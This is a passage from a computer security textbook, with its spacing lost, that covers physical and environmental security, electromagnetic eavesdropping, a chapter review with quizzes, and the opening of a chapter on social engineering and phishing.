Whilethismayatfirstseemtobeanoddstatement,considertheuseoflargeareasofopenspacearoundafacility.Foranintrudertocrossthisopenspacetakestime—timeinwhichtheyarevulnerableandtheirpresencemaybediscovered.Intoday’senvironmentinwhichterroristattackshavebecomemorecommon,additionalprecautionsshouldbetakenforareasthatmaybeconsideredapossibletargetforterroristactivity.Inadditiontoopenspace,whichisnecessarytolessentheeffectofexplosions,concretebarriersthatstopvehiclesfromgettingtooclosetofacilitiesshouldalsobeused.Itisnotnecessaryforthesetobeunsightlyconcretewalls;manyfacilitieshaveplacedlarge,roundconcretecircles,filledthemwithdirt,andthenplantedflowersandotherplantstoconstructalarge,immovableplanter.
TechTip
SignsSignscanbeaneffectivecontrol,warningunauthorizedpersonnelnottoenter,locatingcriticalelementsforfirstresponders,andprovidingpathstoexitsinemergencies.Propersignageisanimportantaspectofphysicalsecuritycontrols.
EnvironmentalIssuesEnvironmentalissuesmaynotatfirstseemtoberelatedtosecurity,butwhenconsideringtheavailabilityofacomputersystemornetwork,theymustbetakenintoconsideration.Environmentalissuesincludeitemssuchasheating,ventilation,andairconditioning(HVAC)systems,electricalpower,andthe“environmentsofnature.”HVACsystemsareusedtomaintainthecomfortofanofficeenvironment.Afewyearsback,theywerealsocriticalforthesmoothoperationofcomputersystemsthathadlowtolerancesforhumidityandheat.Today’sdesktopsystemsaremuchmoretolerant,andthelimitingfactorisnowoftenthehumanuser.TheexceptiontothisHVAClimitationiswhenlargequantitiesofequipmentareco-located,inserverroomsandnetworkequipmentclosets.Intheseheat-denseareas,HVACisneededtokeepequipmenttemperatureswithinreasonableranges.OftencertainsecuritydevicessuchasfirewallsandintrusiondetectionsystemsarelocatedinthesesameequipmentclosetsandthelossofHVACsystemscancausethesecriticalsystemstofail.OneinterestingaspectofHVACsystemsisthattheythemselvesareoftencomputercontrolledandfrequentlyprovideremoteaccessviatelephoneornetworkconnections.Theseconnectionsshouldbeprotectedinasimilarmannertocomputermodems,orelseattackersmaylocatethemandchangetheHVACsettingsforanofficeorbuilding.
HVACsystemsforserverroomsandnetworkequipmentclosetsareimportantbecausethedenseequipmentenvironmentcangeneratesignificantamountsofheat.HVACoutagescanresultintemperaturesthatareoutsideequipmentoperatingranges,forcingshutdowns.
Electricalpowerisobviouslyanessentialrequirementforcomputersystemsandnetworks.Electricalpowerissubjecttomomentarysurgesanddisruption.Surgeprotectorsareneededtoprotectsensitiveelectronicequipmentfromfluctuationsinvoltage.Anuninterruptiblepowersupply(UPS)shouldbeconsideredforcriticalsystemssothatalossofpowerwillnothaltprocessing.ThesizeofthebatteriesassociatedwithaUPSwilldeterminetheamountoftimethatitcanoperatebeforeittoolosespower.Manysitesensuresufficientpowertoprovideadministratorstheopportunitytocleanlybringthesystemornetworkdown.Forinstallationsthatrequirecontinuousoperations,evenintheeventofapoweroutage,electricgeneratorsthatautomaticallystartwhenalossofpowerisdetectedcanbeinstalled.Thesesystemsmaytakeafewsecondstostartbeforetheyreachfulloperation,soaUPSshouldalsobeconsideredtosmooththetransitionbetweennormalandbackuppower.
FireSuppressionFiresareacommondisasterthatcanaffectorganizationsandtheircomputingequipment.Firedetectionandfiresuppressiondevicesaretwoapproachestoaddressingthisthreat.Detectorscanbeusefulbecausesomemaybeabletodetectafireinitsveryearlystagesbeforeafiresuppressionsystemisactivated,andtheycanpotentiallysoundawarning.Thiswarningcouldprovideemployeeswiththeopportunitytodealwiththefirebeforeitbecomesseriousenoughforthefiresuppressionequipmenttokickin.Suppressionsystemscomeinseveralvarieties,includingsprinkler-basedsystemsandgas-basedsystems.Standardsprinkler-basedsystemsarenotoptimalfordatacentersbecausewaterwill
ruinlargeelectricalinfrastructuresandmostintegratedcircuit–baseddevices—suchascomputers.Gas-basedsystemsareagoodalternative,thoughtheyalsocarryspecialconcerns.MoreextensivecoverageoffiredetectionandsuppressionisprovidedinChapter8.
WirelessWhensomeonetalksaboutwirelesscommunication,theygenerallyarereferringtocellulartelephones(“cellphones”).Thesedeviceshavebecomeubiquitousintoday’smodernofficeenvironment.Acellphonenetworkconsistsofthephonesthemselves,thecellswiththeiraccompanyingbasestationsthattheyareusedin,andthehardwareandsoftwarethatallowthemtocommunicate.Thebasestationsaremadeupofantennas,receivers,transmitters,andamplifiers.Thebasestationscommunicatewiththosecellphonesthatarecurrentlyinthegeographicalareathatisservicedbythatstation.Asapersontravelsacrosstown,theymayexitandentermultiplecells.Thestationsmustconductahandofftoensurecontinuousoperationforthecellphone.Astheindividualmovestowardtheedgeofacell,amobileswitchingcenternoticesthepowerofthesignalbeginningtodrop,checkswhetheranothercellhasastrongersignalforthephone(cellsfrequentlyoverlap),and,ifso,switchesoperationtothisnewcellandbasestation.Allofthisisdonewithouttheusereverknowingthattheyhavemovedfromonecelltoanother.Wirelesstechnologycanalsobeusedfornetworking.Therearetwo
mainstandardsforwirelessnetworktechnology.Bluetoothisdesignedasashort-range(approximatelytenmeters)personalareanetwork(PAN)cable-replacementtechnologythatcanbebuiltintoavarietyofdevices,suchasmobilephones,tablets,andlaptopcomputers.Theideaistocreatelow-costwirelesstechnologysothatmanydifferentdevicescancommunicatewitheachother.Bluetoothisalsointerestingbecause,unlikeotherwirelesstechnology,itisdesignedsothatdevicescantalkdirectlywitheachotherwithouthavingtogothroughacentraldevice(suchasthebasestationdescribedpreviously).Thisisknownaspeer-to-peer
communication.
TechTip
WirelessNetworkSecurityIssuesDuetoanumberofadvantages,suchastheabilitytotakeyourlaptopwithyouasyoumovearoundyourbuildingandstillstayconnected,wirelessnetworkshavegrowninpopularity.Theyalsoeliminatetheneedtostringnetworkcablesallovertheoffice.Atthesametime,however,theycanbeasecuritynightmareifnotadequatelyprotected.Thesignalforyournetworkdoesn’tstopatyourofficedoororwalljustbecauseitisthere.Itwillcontinuepropagatingtoareasthatmaybeopentoanybody.Thisprovidestheopportunityforotherstoaccessyournetwork.Toavoidthis,youmusttakestepssuchasencryptingtransmissionssothatyourwirelessnetworkdoesn’tbecometheweaklinkinyoursecuritychain.
TheothermajorwirelessstandardistheIEEE802.11setofstandards,whichiswellsuitedforthelocalareanetwork(LAN)environment.802.11networkscanoperateeitherinanadhocpeer-to-peerfashionorininfrastructuremode,whichismorecommon.Ininfrastructuremode,computerswith802.11networkcardscommunicatewithawirelessaccesspoint.Thisaccesspointconnectstothenetworksothatthecomputerscommunicatingwithitareessentiallyalsoconnectedtothenetwork.Whilewirelessnetworksareveryusefulintoday’smodernoffice(and
home),theyarenotwithouttheirsecurityproblems.Accesspointsaregenerallyplacedthroughoutabuildingsothatallemployeescanaccessthecorporatenetwork.Thetransmissionandreceptionareascoveredbyaccesspointsarenoteasilycontrolled.Consequently,manypubliclyaccessibleareasmightfallintotherangeofoneoftheorganization’saccesspoints,oritsBluetooth-enabledsystems,andthusthecorporatenetworkmaybecomevulnerabletoattack.Wirelessnetworksaredesignedtoincorporatesomesecuritymeasures,butalltoooftenthenetworksaresetupwithoutsecurityenabled,andserioussecurityflawsexistinthe802.11design.
CrossCheckWirelessNetworksWirelessnetworksecurityisdiscussedinthischapterinrelationshiptophysicalissuessuchastheplacementofwirelessaccesspoints.Thereare,however,numerousotherissueswithwirelesssecurity,whicharediscussedinChapter12.Makesuretounderstandhowthephysicallocationofwirelessaccesspointsaffectstheotherwirelesssecurityissues.
ElectromagneticEavesdroppingIn1985,apaperbyWimvanEckoftheNetherlandsdescribedwhatbecameknownasthevanEckphenomenon.InthepapervanEckdescribedhoweavesdroppingonwhatwasbeingdisplayedonmonitorscouldbeaccomplishedbypickingupandthendecodingtheelectromagneticinterferenceproducedbythemonitors.Withtheappropriateequipment,theexactimageofwhatisbeingdisplayedcanbere-createdsomedistanceaway.Whiletheoriginalpaperdiscussedemanationsastheyappliedtovideodisplayunits(monitors),thesamephenomenonappliestootherdevicessuchasprintersandcomputers.Thisphenomenonhadactuallybeenknownaboutforquitesometime
beforevanEckpublishedhispaper.TheU.S.DepartmentofDefenseusedthetermTEMPEST(referredtobysomeastheTransientElectroMagneticPulseEmanationSTandard)todescribebothaprograminthemilitarytocontroltheseelectronicemanationsfromelectricalequipmentandtheactualprocessforcontrollingtheemanations.Therearethreebasicwaystopreventtheseemanationsfrombeingpickedupbyanattacker:
Puttheequipmentbeyondthepointthattheemanationscanbepickedup.
Provideshieldingfortheequipmentitself.
Provideashieldedenclosure(suchasaroom)toputtheequipmentin.
Oneofthesimplestwaystoprotectagainstequipmentbeingmonitoredinthisfashionistoputenoughdistancebetweenthetargetandtheattacker.Theemanationscanbepickedupfromonlyalimiteddistance.Ifthephysicalsecurityforthefacilityissufficienttoputenoughspacebetweentheequipmentandpubliclyaccessibleareasthatthesignalscannotbepickedup,thentheorganizationdoesn’thavetotakeanyadditionalmeasurestoensuresecurity.Distanceisnottheonlywaytoprotectagainsteavesdroppingon
electronicemanations.Devicescanbeshieldedsotheiremanationsareblocked.Acquiringenoughpropertytoprovidethenecessarydistanceneededtoprotectagainstaneavesdroppermaybepossibleifthefacilityisinthecountrywithlotsofavailablelandsurroundingit.Indeed,forsmallerorganizationsthatoccupyonlyafewofficesorfloorsinalargeofficebuilding,itwouldbeimpossibletoacquireenoughspace.Inthiscase,theorganizationmayresorttopurchasingshieldedequipment.A“TEMPESTapproved”computerwillcostsignificantlymorethanwhatanormalcomputerwouldcost.Shieldingaroom(inwhatisknownasaFaradaycage)isalsoanextremelyexpensiveendeavor.
Oneofthechallengesinsecurityisdetermininghowmuchtospendonsecuritywithoutspendingtoomuch.Securityspendingshouldbebasedonlikelythreatstoyoursystemsandnetwork.Whileelectronicemanationscanbemonitored,thelikelihoodofthistakingplaceinmostsituationsisremote,whichmakesspendingonitemstoprotectagainstitatbestalowpriority.
Anaturalquestiontoaskis,howprevalentisthisformofattack?Theequipmentneededtoperformelectromagneticeavesdroppingisnotreadilyavailable,butitwouldnotcostaninordinateamountofmoneytoproduceit.Thecostcouldcertainlybeaffordedbyanylargecorporation,andindustrialespionageusingsuchadeviceisapossibility.Whiletherearenopublicrecordsofthissortofactivitybeingconducted,itisreasonabletoassumethatitdoestakeplaceinlargecorporationsandthegovernment,especiallyinforeigncountries.
ModernEavesdroppingNotjustelectromagneticinformationcanbeusedtocarryinformationoutofasystemtoanadversary.Recentadvanceshavedemonstratedthefeasibilityofusingthewebcamsandmicrophonesonsystemstospyonusers,recordingkeystrokesandotheractivities.Thereareevendevicesbuilttointerceptthewirelesssignalsbetweenwirelesskeyboardsandmiceandtransmitthemoveranotherchanneltoanadversary.USB-basedkeyloggerscanbeplacedinthebackofmachines,asinmanycasesthebackofamachineisunguardedorfacingthepublic(watchforthisthenexttimeyouseeareceptionist’smachine).
Chapter3Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingregardingoperationalandorganizationalsecurity.
Identifyvariousoperationalaspectstosecurityinyourorganization
Preventiontechnologiesaredesignedtokeepindividualsfrombeingabletogainaccesstosystemsordatatheyarenotauthorizedtouse.
Previouslyinoperationalenvironments,preventionwasextremelydifficultandrelyingonpreventiontechnologiesalonewasnotsufficient.Thisledtotheriseoftechnologiestodetectandrespondtoeventsthatoccurwhenpreventionfails.
Animportantpartofanyorganization’sapproachtoimplementingsecurityistoestablishpolicies,procedures,standards,andguidelinestodetailwhatusersandadministratorsshouldbedoingtomaintainthe
securityofthesystemsandnetwork.
Identifyvariouspoliciesandproceduresinyourorganization
Policies,procedures,standards,andguidelinesareimportantinestablishingasecurityprogramwithinanorganization.
Thesecuritypolicyandsupportingpoliciesplayanimportantroleinestablishingandmanagingsystemrisk.
PoliciesandproceduresassociatedwithHumanResourcesfunctionalityincludejobrotation,mandatoryvacations,andhiringandterminationpolicies.
Identifythesecurityawarenessandtrainingneedsofanorganization
Securitytrainingandawarenesseffortsarevitalinengagingtheworkforcetoactwithinthedesiredrangeofconductwithrespecttosecurity.
Securityawarenessandtrainingisimportantinachievingcomplianceobjectives.
Securityawarenessandtrainingshouldbemeasuredandmanagedaspartofacomprehensivesecurityprogram.
Understandthedifferenttypesofagreementsemployedinnegotiatingsecurityrequirements
Thedifferentinteroperabilityagreements,includingSLA,BPA,MOUandISA,areusedtoestablishsecurityexpectationsbetweenvariousparties.
Describethephysicalsecuritycomponentsthatcanprotectyourcomputersandnetwork
Physicalsecurityconsistsofallmechanismsusedtoensurethatphysicalaccesstothecomputersystemsandnetworksisrestrictedto
onlyauthorizedusers.
Thepurposeofphysicalaccesscontrolsisthesameasthatofcomputerandnetworkaccesscontrols—torestrictaccesstoonlythosewhoareauthorizedtohaveit.
Thecarefulplacementofequipmentcanprovidesecurityforknownsecurityproblemsexhibitedbywirelessdevicesandthatariseduetoelectronicemanations.
Identifyenvironmentalfactorsthatcanaffectsecurity
Environmentalissuesareimportanttosecuritybecausetheycanaffecttheavailabilityofacomputersystemornetwork.
LossofHVACsystemscanleadtooverheatingproblemsthatcanaffectelectronicequipment,includingsecurity-relateddevices.
Thefrequencyofnaturaldisastersisacontributingfactorthatmustbeconsideredwhenmakingcontingencyprocessingplansforaninstallation.
Firesareacommonproblemfororganizations.Twogeneralapproachestoaddressingthisproblemarefiredetectionandfiresuppression.
Identifyfactorsthataffectthesecurityofthegrowingnumberofwirelesstechnologiesusedfordatatransmission
Wirelessnetworkshavemanysecurityissues,includingthetransmissionandreceptionareascoveredbyaccesspoints,whicharenoteasilycontrolledandcanthusprovideeasynetworkaccessforintruders.
Preventdisclosurethroughelectronicemanations
Withtheappropriateequipment,theexactimageofwhatisbeingdisplayedonacomputermonitorcanbere-createdsomedistance
away,allowingeavesdropperstoviewwhatyouaredoing.
Providingalotofdistancebetweenthesystemyouwishtoprotectandtheclosestplaceaneavesdroppercouldbeisonewaytoprotectagainsteavesdroppingonelectronicemanations.Devicescanalsobeshieldedsothattheiremanationsareblocked.
KeyTermsacceptableusepolicy(AUP)(50)biometrics(62)Bluetooth(65)businesspartnershipagreement(BPA)(59)duecare(53)duediligence(53)guidelines(43)heating,ventilation,andairconditioning(HVAC)(63)IEEE802.11(65)incidentresponsepolicy(54)interconnectionsecurityagreement(ISA)(59)memorandumofunderstanding(MOU)(59)physicalsecurity(61)policies(43)procedures(43)securitypolicy(44)servicelevelagreement(SLA)(59)standards(43)TEMPEST(66)uninterruptiblepowersupply(UPS)(64)userhabits(57)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1._______________arehigh-levelstatementsmadebymanagementthatlayouttheorganization’spositiononsomeissue.
2.Thecollectivetermusedtorefertothesystemsthatareusedtomaintainthecomfortofanofficeenvironmentandthatareoftencontrolledbycomputersystemsis_______________.
3.A(n)_______________isadevicedesignedtoprovidepowertoessentialequipmentforaperiodoftimewhennormalpowerislost.
4._______________areafoundationalsecuritytoolinengagingtheworkforcetoimprovetheoverallsecuritypostureofanorganization.
5._______________areacceptedspecificationsprovidingspecificdetailsonhowapolicyistobeenforced.
6._______________isawirelesstechnologydesignedasashort-range(approximatelytenmeters)personalareanetwork(PAN)cable-replacementtechnologythatmaybebuiltintoavarietyofdevicessuchasmobilephones,tablets,andlaptopcomputers.
7.A(n)_______________isalegaldocumentusedtodescribeabilateralagreementbetweenparties.
8._______________arestep-by-stepinstructionsthatdescribeexactlyhowemployeesareexpectedtoactinagivensituationortoaccomplishaspecifictask.
9.ThesetofstandardsforwirelessnetworksthatiswellsuitedfortheLANenvironmentandwhosenormalmodeistohavecomputerswithnetworkcardscommunicatingwithawirelessaccesspointis_______________.
10.A(n)_______________isalegalagreementbetweenorganizationsestablishingtheterms,conditions,andexpectationsoftherelationshipbetweenthem.
Multiple-ChoiceQuiz1.Whichofthefollowingisaphysicalsecuritythreat?
A.Cleaningcrewsareallowedunsupervisedaccessbecausetheyhaveacontract.
B.Employeesundergobackgroundcriminalchecksbeforebeinghired.
C.Alldataisencryptedbeforebeingbackedup.
D.Alltheabove.
2.Thebenefitoffiredetectionequipmentoverfiresuppressiondevicesis:
A.Firedetectionequipmentisregulated,whereasfiresuppressionequipmentisnot.
B.Firedetectionequipmentwilloftencatchfiresatamuchearlierstage,meaningthatthefirecanbeaddressedbeforesignificantdamagecanoccur.
C.Firedetectionequipmentismuchmorereliablethanfiresuppressionequipment.
D.Thereisnoadvantageoffiredetectionoverfiresuppressionotherthanthecostoffiredetectionequipmentismuchlessthanthecostoffiresuppressionequipment.
3.Whichofthefollowingisacontractualagreementbetweenentitiesthatdescribesspecifiedlevelsofservicethattheservicingentityagreestoguaranteeforthecustomer?
A.Servicelevelagreement
B.Supportlevelagreement
C.Memorandumofunderstanding
D.Businessserviceagreement
4.Duringwhichstepofthepolicylifecycledoestrainingofuserstakeplace?
A.Planforsecurity.
B.Implementtheplans.
C.Monitortheimplementation.
D.Evaluateforeffectiveness.
5.Biometricaccesscontrolsaretypicallyusedinconjunctionwithanotherformofaccesscontrolbecause:
A.Biometricsarestillexpensive.
B.Biometricscannotbecopied.
C.Biometricsarenotalwaysconvenienttouse.
D.Biometricsarenot100percentaccurate,havingsomelevelofmisidentifications.
6.Procedurescanbedescribedas:A.High-level,broadstatementsofwhattheorganizationwantsto
accomplish
B.Step-by-stepinstructionsonhowtoimplementthepolicies
C.Mandatoryelementsregardingtheimplementationofapolicy
D.Recommendationsrelatingtoapolicy
7.Whattechniquecanbeusedtoprotectagainstelectromagnetic
eavesdropping(knownasthevanEckphenomenon)?
A.Providesufficientdistancebetweenthepotentialtargetandthenearestlocationanattackercouldbe.
B.Puttheequipmentthatyouaretryingtoprotectinsideashieldedroom.
C.Purchase“TEMPESTapproved”equipment.
D.Alloftheabove.
8.Keyuserhabitsthatcanimprovesecurityeffortsinclude:A.Donotdiscussbusinessissuesoutsideoftheoffice.
B.Neverleavelaptopsortabletsinsideyourcarunattended.
C.Bealertofpeopleviolatingphysicalaccessrules(piggybackingthroughdoors).
D.ItemsBandC.
9.Whenshouldahumansecurityguardbeusedforphysicalaccesscontrol?
A.Whenotherelectronicaccesscontrolmechanismswillnotbeacceptedbyemployees
B.Whennecessarytoavoidissuessuchaspiggybacking,whichcanoccurwithelectronicaccesscontrols
C.Whenotheraccesscontrolsaretooexpensivetoimplement
D.Whentheorganizationwantstoenhanceitsimage
10.Whatdeviceshouldbeusedbyorganizationstoprotectsensitiveequipmentfromfluctuationsinvoltage?
A.Asurgeprotector
B.Anuninterruptiblepowersupply
C.Abackuppowergenerator
D.Aredundantarrayofinlinebatteries(RAIB)
EssayQuiz1.Describethedifferencebetweenfiresuppressionandfiredetection
systems.
2.Discusswhyphysicalsecurityisalsoimportanttocomputersecurityprofessionals.
3.WhyshouldwebeconcernedaboutHVACsystemswhendiscussingsecurity?
4.Outlinethevariouscomponentsthatmakeup(orshouldmakeup)anorganization’ssecurityperimeter.Whichofthesecanbefoundinyourorganization(orschool)?
LabProjects
•LabProject3.1Takeatourofyourbuildingoncampusoratwork.Whatissecuredatnightwhenworkersareabsent?Recordthelocationandtypeofphysicalaccesscontroldevices.Howdotheseaccesscontrolschangeatnightwhenworkersareabsent?Howwelltraineddoguardsandotheremployeesappeartobe?Dotheyallow“piggybacking”(somebodyslippingintoafacilitybehindanauthorizedindividualwithoutbeingchallenged)?Whatarethepoliciesforvisitorsandcontractors?Howdoesthisallimpactphysicalsecurity?
•LabProject3.2Describethefourstepsofthepolicylifecycle.Obtainapolicyfromyourorganization(suchasanacceptableusepolicyorInternetusagepolicy).Howareusersinformedofthispolicy?Howoftenisitreviewed?Howwouldchangestoitbesuggestedandwhowouldmakedecisionsonwhetherthechangeswereaccepted?
chapter4 TheRoleofPeopleinSecurity
Youarethewayyouarebecausethat’sthewayyouwanttobe.Ifyoureallywantedtobeanydifferent,youwouldbeintheprocessofchangingrightnow.
T
—FREDSMITH
Inthischapter,youwilllearnhowto
Definebasicterminologyassociatedwithsocialengineering
Describestepsorganizationscantaketoimprovetheirsecurity
Describecommonuseractionsthatmayputanorganization’sinformationatrisk
Recognizemethodsattackersmayusetogaininformationaboutanorganization
Determinewaysinwhichuserscanaidinsteadofdetractfromsecurity
Recognizetheroletrainingandawarenessplaysinassistingthepeoplesideofsecurity
heoperationalmodelofcomputersecuritydiscussedinthepreviouschapteracknowledgesthatabsoluteprotectionofcomputersystemsandnetworksisnotpossibleandthatweneedtobepreparedtodetect
andrespondtoattacksthatareabletocircumventoursecuritymechanisms.Anotherverybasicfactthatshouldberecognizedisthattechnologyalonewillnotsolvethesecurityproblem.Nomatterhowadvancedthetechnologyis,itwillultimatelybedeployedinanenvironmentwherehumansexist.Itisthehumanelementthatposesthebiggestsecuritychallenge.Itishardtocompensateforallofthepossiblewaysthathumanscandeliberatelyoraccidentallycausesecurityproblemsorcircumventoursecuritymechanisms.Despiteallofthetechnology,despiteallofthesecurityprocedureswehaveinplace,anddespiteallofthesecuritytrainingwemayprovide,somebodywillinvariablyfailtodowhattheyaresupposedtodo,ordosomethingtheyarenotsupposedtodo,andcreateavulnerabilityintheorganization’ssecurityposture.Thischapterdiscussesthehumanelementandtherolethatpeopleplayinsecurity—boththeuserpracticesthatcanaidinsecuringanorganizationandthevulnerabilitiesorholesinsecuritythatuserscanintroduce.
People—ASecurityProblem
Theoperationalmodelofcomputersecurityacknowledgesthatpreventiontechnologiesarenotsufficienttoprotectourcomputersystemsandnetworks.Thereareanumberofexplanationsforwhythisistrue,someofthemtechnical,butoneofthebiggestreasonsthatpreventiontechnologiesarenotsufficientisthateverynetworkandcomputersystemhasatleastonehumanuser,andhumansarepronetomakemistakesandareofteneasilymisledorfooled.
SocialEngineeringSocialengineering,ifyourecallfromChapter2,istheprocessofconvincinganauthorizedindividualtoprovideconfidentialinformationoraccesstoanunauthorizedindividual.Itisatechniqueinwhichtheattackerusesvariousdeceptivepracticestoconvincethetargetedpersontodivulgeinformationtheynormallywouldnotdivulgeortoconvincethetargetoftheattacktodosomethingtheynormallywouldn’tdo.Socialengineeringisverysuccessfulfortwogeneralreasons.Thefirstisthebasicdesireofmostpeopletobehelpful.Whensomebodyasksaquestionforwhichweknowtheanswer,ournormalresponseisnottobesuspiciousbutrathertoanswerthequestion.Theproblemwiththisisthatseeminglyinnocuousinformationcanbeusedeitherdirectlyinanattackorindirectlytobuildabiggerpicturethatanattackercanusetocreateanauraofauthenticityduringanattack—themoreinformationanindividualhasaboutanorganization,theeasieritwillbetoconvinceothersthatheispartoftheorganizationandhasarighttoevensensitiveinformation.Anattackerwhoisattemptingtoexploitthenaturaltendencyofpeopletobehelpfulmaytakeoneofseveralapproaches:
TechTip
SocialEngineeringWorks!Skilledsocialengineerssetupscenarioswherethevictimisboxedinbyvarioussocial/work
issuesandthenmakesanexceptionthatenablesthesocialengineertogainsomeformofaccess.Theattackercanpretendtobeanimportantpartyandintimidatealower-levelemployee,orcreateasenseofemergency,scarcity,orurgencythatmovesthevictimtoactinamannertoreducetheconflict.Theattackercanbecomea“victim,”creatingasenseoffellowshipwiththetarget,creatingafalsesenseoffamiliarity,andthenusingthattodriveanaction.SocialengineerscansellicetoEskimosandmakethemproudoftheirpurchase,sotheyaremastersatpsychologicalmanipulation.
Theattackermaysimplyaskaquestion,hopingtoimmediatelyobtainthedesiredinformation.Forbasicinformationthatisnotconsideredsensitive,thisapproachgenerallyworks.Asanexample,anattackermightcallandaskwhotheITmanageris.
Theattackermayfirstattempttoengagethetargetinconversationandtrytoevokesympathysothatthetargetfeelssorryfortheindividualandismorepronetoprovidetheinformation.Forinformationthatisevenslightlysensitiveinnature,therequestofwhichcouldpossiblyarousesuspicion,thistechniquemaybetried.Asanexample,anattackermightcallandclaimtobeundersomedeadlinefromasupervisorwhoisupsetforsomereason.Thetarget,feelingsorryforanallegedfellowworker,maygiveuptheinformation,thinkingtheyarehelpingthemavoidtroublewiththesupervisor.
Theattackermayappealtoanindividual’sego.Asanexample,anattackermightcalltheITdepartment,claimingtohavesomesortofproblem,andpraisingthemforworktheysupposedlydidtohelpanotherworker.Afterbeingtoldhowgreattheyareandhowmuchtheyhelpedsomebodyelse,theywilloftenbetemptedtodemonstratethattheycansupplythesamelevelofhelptoanotherindividual.Thistechniquemaybeusedtoobtainsensitiveinformation,suchashavingthetarget’spasswordreset.
Thesecondreasonthatsocialengineeringissuccessfulisthatindividualsnormallyseektoavoidconfrontationandtrouble.Iftheattackerattemptstointimidatethetarget,threateningtocallthetarget’s
supervisorbecauseofalackofhelp,thetargetmaygiveinandprovidetheinformationtoavoidconfrontation.Thisvariationontheattackisoftensuccessfulinorganizationsthathaveastricthierarchicalstructure.Inthemilitary,forexample,alower-rankingindividualmaybecoercedintoprovidinginformationtoanindividualclaimingtobeofhigherrankortobeworkingforanotherindividualhigherupinthechainofcommand.Socialengineeringmayalsobeaccomplishedusingothermeansbesides
directcontactbetweenthetargetandtheattacker.Forexample,anattackermightsendaforgede-mailwithalinktoaboguswebsitethathasbeensetuptoobtaininformationfromthetargetorconvincethetargettoperformsomeaction.Again,thegoalinsocialengineeringistoconvincethetargettoprovideinformationthattheynormallywouldn’tdivulgeortoperformsomeactthattheynormallywouldnotdo.Anexampleofaslightlydifferentattackthatisgenerallystillconsideredasocialengineeringattackisoneinwhichanattackerreplacestheblankdepositslipsinabank’slobbywithonescontaininghisorherownaccountnumberbutnoname.Whenanunsuspectingcustomerusesoneoftheslips,atellerwhoisnotobservantmayendupcreditingtheattacker’saccountwiththedeposit.
CrossCheckTypesofSocialEngineeringChapters1and2bothdiscussedsocialengineering.Electronicversionsofsocialengineeringhavebecomeverycommon.Whatarethedifferenttypesofsocialengineering(especiallyelectronicversions)thatwehavediscussed?
ObtainingInsiderInformationAnexcellentexampleofsocialengineeringoccurredin1978whenStanleyMarkRifkin,fromCarlsbad,California,stole$10.2millionfromtheSecurityPacificBankinLosAngeles.Detailsofthestoryvary,asRifkinhasneverpubliclydetailedhisactions,butanumberoffactsareknown.Atthetimeoftheattack,Rifkinwasworkingasacomputerconsultantfor
thebank.Whileworkingthere,helearneddetailsonhowmoneycouldeasilybetransferredtoaccountsanywhereintheUnitedStates.Theproblemwouldbetoactuallyobtainthemoneyinthefirstplace.Inordertodothis,heneededtohaveaccesstotheelectronicfundstransfer(EFT)codeusedbythebanktotransfermoneytootherbanks.Usingtheexcuseofcheckingonthecomputerequipmentinsideoftheroomfromwhichthebankmadeitstransfers,Rifkinwasabletoobservethecodeforthatday.Afterleavingtheroom,heusedthisinformationtoimpersonateabankofficerandorderedthetransferofthe$10.2million.Sincehehadknowledgeofthesupposedlysecretcode,thetransferwasmadewithlittlefanfare(thisamountwaswellbelowanylevelthatwouldtriggeranysuspicion).EarlierRifkinhadsetupabogusaccountinaNewYorkbank,usingafalsename,andhedepositedthemoneyintothataccount.HelatertransferredthemoneyagaintoanotheraccountinSwitzerlandunderadifferentname.Hethenusedthemoneytopurchasemillionsofdollarsindiamonds,whichhethensmuggledbackintotheUnitedStates.Thecrimemighthavegoneundetectedifhehadnotboastedofhisexploitstoanindividualwhowasmorethanhappytoturnhimin.In1979,Rifkinwassentencedtoeightyearsinprison.Athistrialheattemptedtoconvincethejudgethatheshouldbereleasedsohecouldteachothershowtoprotecttheirsystemsagainstthetypeofactivityheperpetrated.Thejudgedeniedthisrequest.Thediamondswereultimatelyturnedovertothebank,whichtriedtorecoveritslossbysellingthem.
Uptothispoint,socialengineeringhasbeendiscussedinthecontextofanoutsiderattemptingtogaininformationabouttheorganization.Thisdoesnothavetobethecase.Insidersmayalsoattempttogaininformationtheyarenotauthorizedtohave.Inmanycases,theinsidermaybemuchmoresuccessfulsincetheywillalreadyhaveacertainlevelofinformationregardingtheorganizationandcanthereforebetterspinastorythatmaybebelievabletootheremployees.
PhishingPhishing(pronounced“fishing”)isatypeofsocialengineeringinwhich
anattackerattemptstoobtainsensitiveinformationfromauserbymasqueradingasatrustedentityinane-mailorinstantmessagesenttoalargegroupofoftenrandomusers.Theattackerattemptstoobtaininformationsuchasusernames,passwords,creditcardnumbers,anddetailsabouttheuser’sbankaccounts.ThemessagesentoftenencouragestheusertogotoawebsitethatappearstobeforareputableentitysuchasPayPaloreBay,bothofwhichhavefrequentlybeenusedinphishingattempts.Thewebsitetheuseractuallyvisitsisnotownedbythereputableorganization,however,andaskstheusertosupplyinformationthatcanbeusedinalaterattack.Oftenthemessagesenttotheuserwillstatethattheuser’saccounthasbeencompromisedandwillrequest,forsecuritypurposes,theusertoentertheiraccountinformationtoverifythedetails.Inanotherverycommonexampleofphishing,theattackersendsabulk
e-mail,supposedlyfromabank,tellingtherecipientsthatasecuritybreachhasoccurredandinstructingthemtoclickalinktoverifythattheiraccounthasnotbeentamperedwith.Iftheindividualactuallyclicksthelink,theyaretakentoasitethatappearstobeownedbythebankbutisactuallycontrolledbytheattacker.Whentheysupplytheiraccountandpasswordfor“verification”purposes,theyareactuallygivingittotheattacker.
Phishingisnowthemostcommonformofsocialengineeringattackrelatedtocomputersecurity.Thetargetmaybeacomputersystemandaccesstotheinformationfoundonit(suchasisthecasewhenthephishingattemptasksforauserIDandpassword)orthetargetmaybepersonalinformation,generallyfinancial,aboutanindividual(inthecaseofphishingattemptsthataskforanindividual’sbankinginformation).
Thee-mailsandwebsitesgeneratedbytheattackersoftenappeartobelegitimate.Afewclues,however,cantipofftheuserthatthee-mailmightnotbewhatitclaimstobe.Thee-mailmaycontaingrammaticalandtypographicalerrors,forexample.Organizationsthatareusedinthese
